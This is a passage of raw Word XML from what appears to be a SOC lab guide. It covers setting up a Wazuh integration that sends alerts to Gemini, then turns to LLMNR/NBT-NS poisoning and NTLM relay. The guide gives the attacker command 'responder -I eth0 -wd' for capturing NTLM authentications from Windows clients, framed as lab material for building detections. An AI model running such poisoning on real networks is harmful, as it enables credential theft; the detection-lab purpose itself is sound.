          <w:p w14:paraId="55FE3511" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>def send_event(msg, agent=None):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1446B182" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    if not agent or agent.get("id") == "000":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77148404" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        string = f'1:gemini:{json.dumps(msg)}'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69198BB5" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14117B25" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        string = f'1:[{agent["id"]}] ({agent["name"]}) {agent.get("ip", "any")}-&gt;gemini:{json.dumps(msg)}'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DADEC7D" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="14568481" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    debug(f"# Sending event: {string}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5625FD89" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    sock = socket(AF_UNIX, SOCK_DGRAM)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A7C6536" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    sock.connect(socket_addr)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6143866E" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    sock.send(string.encode())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7689248A" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    sock.close()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="064BC8A2" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="245CA421" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>if __name__ == "__main__":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11113F16" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DADF234" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        main(sys.argv)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75318C1B" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    except Exception as e:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08D8D223" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        debug(f"# Exception: {str(e)}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1437A471" w14:textId="0102329B" w:rsidR="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r>
              <w:t>raise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7831B4C6" w14:textId="77777777" w:rsidR="00462151" w:rsidRDefault="00462151" w:rsidP="00462151"/>
    <w:p w14:paraId="731BDE27" w14:textId="77777777" w:rsidR="00462151" w:rsidRDefault="00462151" w:rsidP="00462151"/>
    <w:p w14:paraId="52F03280" w14:textId="63CE490A" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00462151">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704A8D5F" w14:textId="4B7DACFE" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00462151">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Set Gemini API Key f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">rom </w:t>
      </w:r>
      <w:r w:rsidRPr="00462151">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>https://aistudio.google.com/app/apikey</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462151" w14:paraId="0FC9CBC0" w14:textId="77777777" w:rsidTr="00462151">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="77229738" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="007E2EA1" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E2EA1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t># On Ubuntu Wazuh server(temporary, per session)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="051047DE" w14:textId="1A98D01E" w:rsidR="00462151" w:rsidRPr="007E2EA1" w:rsidRDefault="00462151" w:rsidP="007E2EA1">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007E2EA1">
              <w:t>export GEMINI_API_KEY="API_KEY"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CA1C153" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="007E2EA1" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E2EA1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t># On Ubuntu (persistent)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44827767" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00567DF6" w:rsidRDefault="00462151" w:rsidP="007E2EA1">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567DF6">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>sudo nano /etc/environment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C2B739F" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="001E2C55" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001E2C55">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t># Add:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09FF865D" w14:textId="28259844" w:rsidR="00462151" w:rsidRPr="007E2EA1" w:rsidRDefault="00462151" w:rsidP="007E2EA1">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007E2EA1">
              <w:t>GEMINI_API_KEY="</w:t>
            </w:r>
            <w:r w:rsidR="007E2EA1" w:rsidRPr="007E2EA1">
              <w:t>API_KEY</w:t>
            </w:r>
            <w:r w:rsidRPr="007E2EA1">
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AD24AF8" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="007E2EA1" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E2EA1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t># Reload environment:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CA48D34" w14:textId="0A517BD9" w:rsidR="00462151" w:rsidRPr="00567DF6" w:rsidRDefault="00462151" w:rsidP="007E2EA1">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567DF6">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>source /etc/environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BA34BA2" w14:textId="5B8E7943" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151"/>
    <w:p w14:paraId="029962D7" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00462151">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wazuh Manager Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5171958A" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="007E2EA1" w:rsidRDefault="00462151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00462151">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Place the Python fil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E2EA1" w:rsidRPr="001E2C55" w14:paraId="33229159" w14:textId="77777777" w:rsidTr="007E2EA1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="769BD1D6" w14:textId="77777777" w:rsidR="007E2EA1" w:rsidRDefault="007E2EA1" w:rsidP="007E2EA1">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007E2EA1">
              <w:t>sudo nano /var/ossec/integrations/custom-gemini.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AF87EBE" w14:textId="77777777" w:rsidR="007E2EA1" w:rsidRDefault="007E2EA1" w:rsidP="007E2EA1">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3FA95D7E" w14:textId="77777777" w:rsidR="007E2EA1" w:rsidRPr="00462151" w:rsidRDefault="007E2EA1" w:rsidP="007E2EA1">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>sudo chmod 750 /var/ossec/integrations/custom-gemini.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="306F2671" w14:textId="152CDFE8" w:rsidR="007E2EA1" w:rsidRPr="007E2EA1" w:rsidRDefault="007E2EA1" w:rsidP="007E2EA1">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>sudo chown root:wazuh /var/ossec/integrations/custom-gemini.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29619405" w14:textId="77777777" w:rsidR="007E2EA1" w:rsidRPr="00567DF6" w:rsidRDefault="007E2EA1" w:rsidP="007E2EA1">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02257E60" w14:textId="7EA8B62B" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00462151">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Add Gemini integration in /var/ossec/etc/ossec.conf:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10456"/>
      </w:tblGrid>
      <w:tr w:rsidR="007E2EA1" w:rsidRPr="001E2C55" w14:paraId="0B6F09C2" w14:textId="77777777" w:rsidTr="007E2EA1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="318E41C4" w14:textId="77777777" w:rsidR="007E2EA1" w:rsidRPr="00462151" w:rsidRDefault="007E2EA1" w:rsidP="007E2EA1">
            <w:r w:rsidRPr="00462151">
              <w:t>&lt;integration&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="397DB84C" w14:textId="453D529B" w:rsidR="007E2EA1" w:rsidRPr="00462151" w:rsidRDefault="007E2EA1" w:rsidP="007E2EA1">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00462151">
              <w:t>&lt;name&gt;custom-gemini&lt;/name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27140903" w14:textId="2125FCE1" w:rsidR="007E2EA1" w:rsidRDefault="007E2EA1" w:rsidP="007E2EA1">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00462151">
              <w:t>&lt;alert_format&gt;json&lt;/alert_format&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46AA83EB" w14:textId="754843ED" w:rsidR="007E2EA1" w:rsidRPr="007E2EA1" w:rsidRDefault="007E2EA1" w:rsidP="007E2EA1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567DF6">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="007E2EA1">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>&lt;rule_id&gt;100101&lt;/rule_id&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="406C07AB" w14:textId="3A922747" w:rsidR="007E2EA1" w:rsidRPr="007E2EA1" w:rsidRDefault="007E2EA1" w:rsidP="007E2EA1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E2EA1">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>&lt;/integration&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E6C42C2" w14:textId="77777777" w:rsidR="007E2EA1" w:rsidRPr="007E2EA1" w:rsidRDefault="007E2EA1" w:rsidP="007E2EA1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ECEE78C" w14:textId="03DA72A1" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00462151">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Restart Wazuh manag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E2EA1" w:rsidRPr="001E2C55" w14:paraId="45D3CE2D" w14:textId="77777777" w:rsidTr="007E2EA1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="59E1C873" w14:textId="01A3E0A2" w:rsidR="007E2EA1" w:rsidRDefault="007E2EA1" w:rsidP="007E2EA1">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>sudo systemctl restart wazuh-manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A54A05C" w14:textId="5B481B97" w:rsidR="00462151" w:rsidRPr="00567DF6" w:rsidRDefault="00462151" w:rsidP="00462151">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B98BC4B" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00462151">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Manual Tes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7E2EA1" w:rsidRPr="001E2C55" w14:paraId="20572FA0" w14:textId="77777777" w:rsidTr="00E9257D">
        <w:trPr>
          <w:trHeight w:val="402"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="751288BA" w14:textId="77777777" w:rsidR="007E2EA1" w:rsidRPr="00462151" w:rsidRDefault="007E2EA1" w:rsidP="007E2EA1">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>sudo /var/ossec/framework/python/bin/python3 \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="148A7FD8" w14:textId="1B93CE5F" w:rsidR="007E2EA1" w:rsidRPr="007E2EA1" w:rsidRDefault="007E2EA1" w:rsidP="007E2EA1">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">  /var/ossec/integrations/custom-gemini.py /tmp/test-alert.json $GEMINI_API_KEY debug</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0AEF3319" w14:textId="77777777" w:rsidR="00477826" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E378AC" w14:textId="406F5A7D" w:rsidR="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">LLMNR &amp; SMB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A03D782" w14:textId="77777777" w:rsidR="00477826" w:rsidRDefault="00477826" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F3E5D18" w14:textId="72B9921F" w:rsidR="00477826" w:rsidRPr="00477826" w:rsidRDefault="00477826" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00477826">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>LLMNR/NBT-NS poisoning lets an attacker respond to name resolution requests and capture NTLM authentication attempts from Windows clients. NTLM relay reuses those captured authentications against a target service (SMB, LDAP, HTTP, etc.). In modern environments SMB signing often blocks relays; however capture events and failed/successful NTLM network logons are reliable detection signals for SOC analysts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C10798A" w14:textId="77777777" w:rsidR="00477826" w:rsidRDefault="00477826" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1299418B" w14:textId="323770CB" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">1- </w:t>
      </w:r>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>LLMNR Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F78ED98" w14:textId="03907C55" w:rsidR="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>On Kali (attacke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879E9" w:rsidRPr="001E2C55" w14:paraId="40CC9E68" w14:textId="77777777" w:rsidTr="00E879E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5B6EB2C2" w14:textId="7D5C268D" w:rsidR="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E879E9">
              <w:t>sudo responder -I eth0 -wd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="230836DE" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E3410FD" w14:textId="6B584272" w:rsidR="00477826" w:rsidRPr="00E879E9" w:rsidRDefault="00477826" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="144DC953" wp14:editId="797A7E9D">
            <wp:extent cx="4944110" cy="2859405"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="10834678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59405"/>
                    </a:xfrm>
